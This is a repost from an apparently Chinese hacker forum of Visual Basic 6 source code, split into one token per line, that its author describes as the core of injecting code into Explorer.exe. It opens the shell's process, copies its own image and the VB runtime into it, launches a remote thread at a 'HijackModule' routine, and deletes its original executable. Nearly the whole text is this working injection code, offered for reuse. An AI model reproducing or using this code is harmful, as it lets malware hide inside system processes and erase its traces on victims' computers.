文章作者:零号(暗夜盛装)
信息来源:黑客动画吧
QUOTE:
这是注入EXPLORER.EXE线程内存保留地址的核心代码.终于突破了`
555555
Option
Explicit
Public
Declare
Function
OpenProcess
Lib
"
kernel32
"
(
ByVal
dwDesiredAccess
As
Long
,
ByVal
bInheritHandle
As
Long
,
ByVal
dwProcessId
As
Long
)
As
Long
Public
Declare
Function
VirtualAllocEx
Lib
"
kernel32
"
(
ByVal
ProcessHandle
As
Long
,
ByVal
lpAddress
As
Long
,
ByVal
dwSize
As
Long
,
ByVal
flAllocationType
As
Long
,
ByVal
flProtect
As
Long
)
As
Long
Public
Declare
Function
VirtualFreeEx
Lib
"
kernel32
"
(
ByVal
ProcessHandle
As
Long
, lpAddress
As
Any,
ByVal
dwSize
As
Long
,
ByVal
dwFreeType
As
Long
)
As
Long
Public
Declare
Function
GetWindowThreadProcessId
Lib
"
user32
"
(
ByVal
hwnd
As
Long
, lpdwProcessId
As
Long
)
As
Long
Public
Declare
Function
GetProcAddress
Lib
"
kernel32
"
(
ByVal
hModule
As
Long
,
ByVal
lpProcName
As
String
)
As
Long
Public
Declare
Function
FindWindow
Lib
"
user32
"
Alias
"
FindWindowA
"
(
ByVal
lpClassName
As
Any,
ByVal
lpWindowName
As
Any)
As
Long
Public
Declare
Function
CreateRemoteThread
Lib
"
kernel32
"
(
ByVal
ProcessHandle
As
Long
, lpThreadAttributes
As
Long
,
ByVal
dwStackSize
As
Long
, lpStartAddress
As
Long
, lpParameter
As
Any,
ByVal
dwCreationFlags
As
Long
, lpthreadid
As
Long
)
As
Long
Public
Declare
Function
CreateThread
Lib
"
kernel32
"
(
ByVal
lpThreadAttributes
As
Any,
ByVal
dwStackSize
As
Long
,
ByVal
lpStartAddress
As
Long
, lpParameter
As
Any,
ByVal
dwCreationFlags
As
Long
, lpthreadid
As
Long
)
As
Long
Public
Declare
Function
GetModuleHandleA
Lib
"
kernel32
"
(
ByVal
ModName
As
Any)
As
Long
Public
Declare
Function
WriteProcessMemory
Lib
"
kernel32
"
(
ByVal
ProcessHandle
As
Long
, lpBaseAddress
As
Any, lpBuffer
As
Any,
ByVal
nSize
As
Long
, lpNumberOfBytesWritten
As
Long
)
As
Long
Public
Declare
Function
ReadProcessMemory
Lib
"
kernel32
"
(
ByVal
hProcess
As
Long
, lpBaseAddress
As
Any, lpBuffer
As
Any,
ByVal
nSize
As
Long
, lpNumberOfBytesWritten
As
Long
)
As
Long
Public
Declare
Function
LoadLibrary
Lib
"
kernel32
"
Alias
"
LoadLibraryA
"
(
ByVal
lpLibFileName
As
String
)
As
Long
Public
Declare
Function
CallWindowProc
Lib
"
user32
"
Alias
"
CallWindowProcA
"
(
ByVal
lpPrevWndFunc
As
Long
,
ByVal
hwnd
As
Long
,
ByVal
Msg
As
Any,
ByVal
wParam
As
Any,
ByVal
lParam
As
Any)
As
Long
Public
Declare
Function
MessageBox
Lib
"
user32
"
Alias
"
MessageBoxA
"
(
ByVal
hwnd
As
Long
,
ByVal
lpText
As
String
,
ByVal
lpCaption
As
String
,
ByVal
wType
As
Long
)
As
Long
Public
Declare
Function
DeleteFile
Lib
"
kernel32
"
Alias
"
DeleteFileA
"
(
ByVal
lpFileName
As
String
)
As
Long
Public
Declare
Function
CreateEvent
Lib
"
kernel32
"
Alias
"
CreateEventA
"
(
ByVal
lpEventAttributes
As
Long
,
ByVal
bManualReset
As
Long
,
ByVal
bInitialState
As
Long
,
ByVal
lpname
As
String
)
As
Long
Public
Declare
Function
GetModuleFileName
Lib
"
kernel32
"
Alias
"
GetModuleFileNameA
"
(
ByVal
hModule
As
Integer
,
ByVal
lpFileName
As
String
,
ByVal
nSize
As
Integer
)
As
Integer
Public
Declare
Function
GetCurrentProcessId
Lib
"
kernel32
"
()
As
Long
Public
Declare
Function
GetMessage
Lib
"
user32
"
Alias
"
GetMessageA
"
(lpMsg
As
Msg,
ByVal
hwnd
As
Long
,
ByVal
wMsgFilterMin
As
Long
,
ByVal
wMsgFilterMax
As
Long
)
As
Long
Public
Declare
Function
TranslateMessage
Lib
"
user32
"
(lpMsg
As
Msg)
As
Long
Public
Declare
Function
DispatchMessage
Lib
"
user32
"
Alias
"
DispatchMessageA
"
(lpMsg
As
Msg)
As
Long
Public
Declare
Function
ShowWindow
Lib
"
user32
"
(
ByVal
hwnd
As
Long
,
ByVal
nCmdShow
As
Long
)
As
Long
Public
Declare
Function
LoadCursor
Lib
"
user32
"
Alias
"
LoadCursorA
"
(
ByVal
hInstance
As
Long
,
ByVal
lpCursorName
As
Any)
As
Long
Public
Declare
Function
LoadIcon
Lib
"
user32
"
Alias
"
LoadIconA
"
(
ByVal
hInstance
As
Long
,
ByVal
lpIconName
As
String
)
As
Long
Public
Declare
Function
CreateFontIndirect
Lib
"
gdi32
"
Alias
"
CreateFontIndirectA
"
(lpLogFont
As
LOGFONT)
As
Long
Public
Declare
Function
DestroyWindow
Lib
"
user32
"
(
ByVal
hwnd
As
Long
)
As
Long
Public
Declare
Function
SendMessage
Lib
"
user32
"
Alias
"
SendMessageA
"
(
ByVal
hwnd
As
Long
,
ByVal
wMsg
As
Long
,
ByVal
wParam
As
Long
, lParam
As
Any)
As
Long
Public
Declare
Function
CreateWindowEx
Lib
"
user32
"
Alias
"
CreateWindowExA
"
(
ByVal
dwExStyle
As
Long
,
ByVal
lpClassName
As
String
,
ByVal
lpWindowName
As
String
,
ByVal
dwStyle
As
Long
,
ByVal
x
As
Long
,
ByVal
y
As
Long
,
ByVal
nWidth
As
Long
,
ByVal
nHeight
As
Long
,
ByVal
hWndParent
As
Long
,
ByVal
hMenu
As
Long
,
ByVal
hInstance
As
Long
, lpParam
As
Any)
As
Long
Public
Declare
Function
SetWindowText
Lib
"
user32
"
Alias
"
SetWindowTextA
"
(
ByVal
hwnd
As
Long
,
ByVal
lpString
As
String
)
As
Long
Public
Declare
Function
SetWindowLong
Lib
"
user32
"
Alias
"
SetWindowLongA
"
(
ByVal
hwnd
As
Long
,
ByVal
nIndex
As
Long
,
ByVal
dwNewLong
As
Long
)
As
Long
Public
Declare
Function
RegisterClass
Lib
"
user32
"
Alias
"
RegisterClassA
"
(
Class
As
WNDCLASS)
As
Long
Public
Declare
Function
UnregisterClass
Lib
"
user32
"
Alias
"
UnregisterClassA
"
(
ByVal
lpClassName
As
String
,
ByVal
hInstance
As
Long
)
As
Long
Public
Declare
Function
DefWindowProc
Lib
"
user32
"
Alias
"
DefWindowProcA
"
(
ByVal
hwnd
As
Long
,
ByVal
wMsg
As
Long
,
ByVal
wParam
As
Long
,
ByVal
lParam
As
Long
)
As
Long
Public
Declare
Function
CreateFile
Lib
"
kernel32
"
Alias
"
CreateFileA
"
(
ByVal
lpFileName
As
String
,
ByVal
dwDesiredAccess
As
Long
,
ByVal
dwShareMode
As
Long
,
ByVal
lpSecurityAttributes
As
Long
,
ByVal
dwCreationDisposition
As
Long
,
ByVal
dwFlagsAndAttributes
As
Long
,
ByVal
hTemplateFile
As
Long
)
As
Long
Public
Declare
Function
ReadFile
Lib
"
kernel32
"
(
ByVal
hFile
As
Long
, lpBuffer
As
Any,
ByVal
nNumberOfBytesToRead
As
Long
, lpNumberOfBytesRead
As
Long
,
ByVal
lpOverlapped
As
Long
)
As
Long
Public
Declare
Function
CloseHandle
Lib
"
kernel32
"
(
ByVal
hObject
As
Long
)
As
Long
Public
Declare
Function
WriteFile
Lib
"
kernel32
"
(
ByVal
hFile
As
Long
, lpBuffer
As
Any,
ByVal
nNumberOfBytesToWrite
As
Long
, lpNumberOfBytesWritten
As
Long
,
ByVal
lpOverlapped
As
Long
)
As
Long
Public
Declare
Function
GetFileSize
Lib
"
kernel32
"
(
ByVal
hFile
As
Long
, lpFileSizeHigh
As
Long
)
As
Long
Public
Declare
Function
GetLastError
Lib
"
kernel32
"
()
As
Long
Public
Declare
Sub
Sleep
Lib
"
kernel32
"
(
ByVal
time
As
Long
)
Public
Declare
Sub
PostQuitMessage
Lib
"
user32
"
(
ByVal
nExitCode
As
Long
)
Public
Declare
Sub
ExitThread
Lib
"
kernel32
"
(
ByVal
dwExitCode
As
Long
)
Public
Declare
Sub
ExitProcess
Lib
"
kernel32
"
(
ByVal
dwExitCode
As
Long
)
Public
Declare
Sub
CopyMemory
Lib
"
kernel32
"
Alias
"
RtlMoveMemory
"
(Destination
As
Any, Source
As
Any,
ByVal
Length
As
Long
)
Public
Type POINTAPI
x
As
Long
y
As
Long
End
Type
Public
Type Msg
hwnd
As
Long
message
As
Long
wParam
As
Long
lParam
As
Long
time
As
Long
pt
As
POINTAPI
End
Type
Public
Type WNDCLASS
style
As
Long
lpfnwndproc
As
Long
cbClsextra
As
Long
cbWndExtra2
As
Long
hInstance
As
Long
hIcon
As
Long
hCursor
As
Long
hbrBackground
As
Long
lpszMenuName
As
String
lpszClassName
As
String
End
Type
Public
Type LOGFONT
lfHeight
As
Long
lfWidth
As
Long
lfEscapement
As
Long
lfOrientation
As
Long
lfWeight
As
Long
lfItalic
As
Byte
lfUnderline
As
Byte
lfStrikeOut
As
Byte
lfCharSet
As
Byte
lfOutPrecision
As
Byte
lfClipPrecision
As
Byte
lfQuality
As
Byte
lfPitchAndFamily
As
Byte
lfFaceName(
32
)
As
Byte
End
Type
Public
Const
GWL_WNDPROC
=
(
-
4
)
Public
Const
WS_VISIBLE
=
&
H10000000
Public
Const
WS_CHILD
=
&
H40000000
Public
Const
WS_THICKFRAME
=
&
H40000
Public
Const
WS_TABSTOP
=
&
H10000
Public
Const
WS_BORDER
=
&
H800000
Public
Const
WS_OVERLAPPED
=
&
H0
&
Public
Const
WS_CAPTION
=
&
HC00000
Public
Const
WS_SYSMENU
=
&
H80000
Public
Const
WS_MINIMIZEBOX
=
&
H20000
Public
Const
WS_MAXIMIZEBOX
=
&
H10000
Public
Const
WS_OVERLAPPEDWINDOW
=
(WS_OVERLAPPED
Or
WS_CAPTION
Or
WS_SYSMENU
Or
WS_THICKFRAME
Or
WS_MINIMIZEBOX
Or
WS_MAXIMIZEBOX)
Public
Const
WS_EX_CLIENTEDGE
=
&
H200
&
Public
Const
WS_EX_WINDOWEDGE
=
&
H100
&
Public
Const
WS_EX_STATICEDGE
=
&
H20000
Public
Const
WM_SETTEXT
=
&
HC
Public
Const
WM_GETTEXTLENGTH
=
&
HE
Public
Const
WM_VSCROLL
=
&
H115
Public
Const
WM_KEYUP
=
&
H101
Public
Const
WM_LBUTTONUP
=
&
H202
Public
Const
WM_LBUTTONDOWN
=
&
H201
Public
Const
WM_SHOWWINDOW
=
&
H18
Public
Const
WM_DESTROY
=
&
H2
Public
Const
WM_SETFONT
=
&
H30
Public
Const
WM_COPY
=
&
H301
Public
Const
WM_PASTE
=
&
H302
Public
Const
INVALID_HANDLE_VALUE
=
-
1
Public
Const
GENERIC_WRITE
=
&
H40000000
Public
Const
GENERIC_READ
=
&
H80000000
Public
Const
GENERIC_ALL
=
&
H10000000
Public
Const
FILE_ATTRIBUTE_NORMAL
=
&
H80
Public
Const
CREATE_NEW
=
1
Public
Const
CREATE_ALWAYS
=
2
Public
Const
OPEN_EXISTING
=
3
Public
Const
OPEN_ALWAYS
=
4
Public
Const
FILE_SHARE_READ
=
&
H1
Public
Const
FILE_SHARE_WRITE
=
&
H2
Public
Const
TRUNCATE_EXISTING
=
5
Public
Const
COLOR_WINDOW
=
5
Public
Const
IDC_ARROW
=
32512
&
Public
Const
IDI_APPLICATION
=
32512
&
Public
Const
SW_SHOWNORMAL
=
1
Public
Const
CW_USEDEFAULT
=
&
H80000000
Public
Const
gClassName
=
"
CustomClName
"
Public
Const
gAppName
=
"
Application caption
"
Public
ghWnd
As
Long
Const
MEM_COMMIT
=
&
H1000
Const
MEM_RESERVE
=
&
H2000
Const
MEM_RELEASE
=
&
H8000
Const
PAGE_EXECUTE_READWRITE
=
&
H40
&
Const
IMAGE_NUMBEROF_DIRECTIRY_ENRIES
=
16
Const
STANDARD_RIGHTS_REQUIRED
=
&
HF0000
Const
SYNCHRONIZE
=
&
H100000
Const
PROCESS_ALL_ACCESS
=
(STANDARD_RIGHTS_REQUIRED
Or
SYNCHRONIZE
Or
&
HFFF)
Type IMAGE_DATA_DIRECTORY
VirtualAddress
As
Long
Size
As
Long
End
Type
Type IMAGE_FILE_HEADER
Machine
As
Integer
NumberOfSections
As
Integer
TimeDataStamp
As
Long
PointerToSymbolTable
As
Long
NumberOfSymbols
As
Long
SizeOfOptionalHeader
As
Integer
Characteristics
As
Integer
End
Type
Type IMAGE_OPTIONAL_HEADER32
Magic
As
Integer
MajorLinkerVersion
As
Byte
MinorLinkerVersion
As
Byte
SizeOfCode
As
Long
SizeOfInitalizedData
As
Long
SizeOfUninitalizedData
As
Long
AddressOfEntryPoint
As
Long
BaseOfCode
As
Long
BaseOfData
As
Long
ImageBase
As
Long
SectionAlignment
As
Long
FileAlignment
As
Long
MajorOperatingSystemVersion
As
Integer
MinorOperatingSystemVersion
As
Integer
MajorImageVersion
As
Integer
MinorImageVersion
As
Integer
MajorSubsystemVersion
As
Integer
MinorSubsystemVersion
As
Integer
Reserved1
As
Long
SizeOfImage
As
Long
SizeOfHeaders
As
Long
CheckSum
As
Long
Subsystem
As
Integer
DllCharacteristics
As
Integer
SizeOfStackReserve
As
Long
SizeOfStackCommit
As
Long
SizeOfHeapReserve
As
Long
SizeOfHeapCommit
As
Long
LoaerFlags
As
Long
NumberOfRvaAndSizes
As
Long
DataDirectory(IMAGE_NUMBEROF_DIRECTIRY_ENRIES
-
1
)
As
IMAGE_DATA_DIRECTORY
End
Type
Type test
szTarget
As
String
End
Type
Type IMAGE_DOS_HEADER
e_magic
As
Integer
e_cblp
As
Integer
e_cp
As
Integer
e_crlc
As
Integer
e_cparhdr
As
Integer
e_minalloc
As
Integer
e_maxalloc
As
Integer
e_ss
As
Integer
e_sp
As
Integer
e_csum
As
Integer
e_ip
As
Integer
e_cs
As
Integer
e_lfarlc
As
Integer
e_onvo
As
Integer
e_res(
3
)
As
Integer
e_oemid
As
Integer
e_oeminfo
As
Integer
e_res2(
9
)
As
Integer
e_lfanew
As
Long
End
Type
Const
szTarget
As
String
=
"
ProgMan
"
Global szFileName
As
String
*
261
Public
Sub
Main()
Dim
PID
As
Long
, ProcessHandle
As
Long
Dim
Size
As
Long
, BytesWritten
As
Long
, TID
As
Long
,
Module
As
Long
, NewModule
As
Long
Dim
PImageOptionalHeader
As
IMAGE_OPTIONAL_HEADER32, PImageDosHeader
As
IMAGE_DOS_HEADER, TImageFileHeader
As
IMAGE_FILE_HEADER
Dim
ExeVariable
As
Long
GetModuleFileName
0
, szFileName,
261
GetWindowThreadProcessId FindWindow(szTarget,
0
&
), PID
ProcessHandle
=
OpenProcess(PROCESS_ALL_ACCESS,
0
, PID)
Module
=
GetModuleHandleA(vbNullString)
CopyMemory PImageDosHeader,
ByVal
Module
,
Len
(PImageDosHeader)
CopyMemory PImageOptionalHeader,
ByVal
(
Module
+
PImageDosHeader.e_lfanew
+
4
+
Len
(TImageFileHeader)),
Len
(PImageOptionalHeader)
Size
=
PImageOptionalHeader.SizeOfImage
VirtualFreeEx ProcessHandle,
Module
,
0
, MEM_RELEASE
NewModule
=
VirtualAllocEx(ProcessHandle,
Module
, Size, MEM_RESERVE
Or
MEM_COMMIT, PAGE_EXECUTE_READWRITE)
WriteProcessMemory ProcessHandle,
ByVal
NewModule,
ByVal
Module
, Size, BytesWritten
ExeVariable
=
VirtualAllocEx(ProcessHandle,
0
,
261
, MEM_RESERVE
Or
MEM_COMMIT, PAGE_EXECUTE_READWRITE)
WriteProcessMemory ProcessHandle,
ByVal
ExeVariable,
ByVal
szFileName,
261
, BytesWritten
Dim
VBMod
As
Long
, VBSize
As
Long
, VBNewMod
As
Long
VBMod
=
GetModuleHandleA(
"
msvbvm60.dll
"
)
CopyMemory PImageDosHeader,
ByVal
VBMod,
Len
(PImageDosHeader)
CopyMemory PImageOptionalHeader,
ByVal
(VBMod
+
PImageDosHeader.e_lfanew
+
4
+
Len
(TImageFileHeader)),
Len
(PImageOptionalHeader)
VBSize
=
PImageOptionalHeader.SizeOfImage
VBNewMod
=
VirtualAllocEx(ProcessHandle, VBMod, VBSize, MEM_RESERVE
Or
MEM_COMMIT, PAGE_EXECUTE_READWRITE)
WriteProcessMemory ProcessHandle,
ByVal
VBNewMod,
ByVal
VBMod, VBSize, BytesWritten
CreateRemoteThread ProcessHandle,
ByVal
0
,
0
,
ByVal
GetAdd(
AddressOf
HijackModule),
ByVal
ExeVariable,
0
, TID
ExitProcess
0
End Sub
Private
Function
GetAdd(Entrypoint
As
Long
)
As
Long
GetAdd
=
Entrypoint
End Function
Private
Function
MainModule(Stuff
As
Long
)
As
String
Dim
BytesWritten
As
Long
, wc
As
WNDCLASS, szExename
As
String
*
261
Dim
lngFileHandle
As
Long
, lngLength
As
Long
, Exec
As
String
, lBytesRead
As
Long
, szTestName
As
String
ReadProcessMemory OpenProcess(PROCESS_ALL_ACCESS,
0
, GetCurrentProcessId),
ByVal
Stuff,
ByVal
szExename,
261
,
ByVal
BytesWritten
With
wc
.lpfnwndproc
=
GetAdd(
AddressOf
WndProc)
.hbrBackground
=
5
.lpszClassName
=
"
HijackedClass
"
End
With
RegisterClass wc
ShowWindow CreateWindowEx(
0
,
"
HijackedClass
"
,
"
Hijacked Form
"
, WS_OVERLAPPEDWINDOW,
100
,
100
,
340
,
240
,
0
,
0
, GetModuleHandleA(
0
&
),
ByVal
0
&
),
1
MessageBox
0
,
"
Hijack Module Working
"
,
"
Sucess!
"
,
0
DeleteFile szExename
Do
: DoEvents: Sleep
100
:
Loop
End Function
Public
Function
HijackModule(
ByVal
Stuff
As
Long
)
As
Long
MainModule Stuff
End Function
Public
Function
WndProc(
ByVal
hwnd
As
Long
,
ByVal
wMsg
As
Long
,
ByVal
wParam
As
Long
,
ByVal
lParam
As
Long
)
As
Long
If
wMsg
=
&
H201
Then
MessageBox
0
,
"
提示A
"
,
"
提示B
"
,
0
WndProc
=
DefWindowProc(hwnd, wMsg, wParam, lParam)
End Function
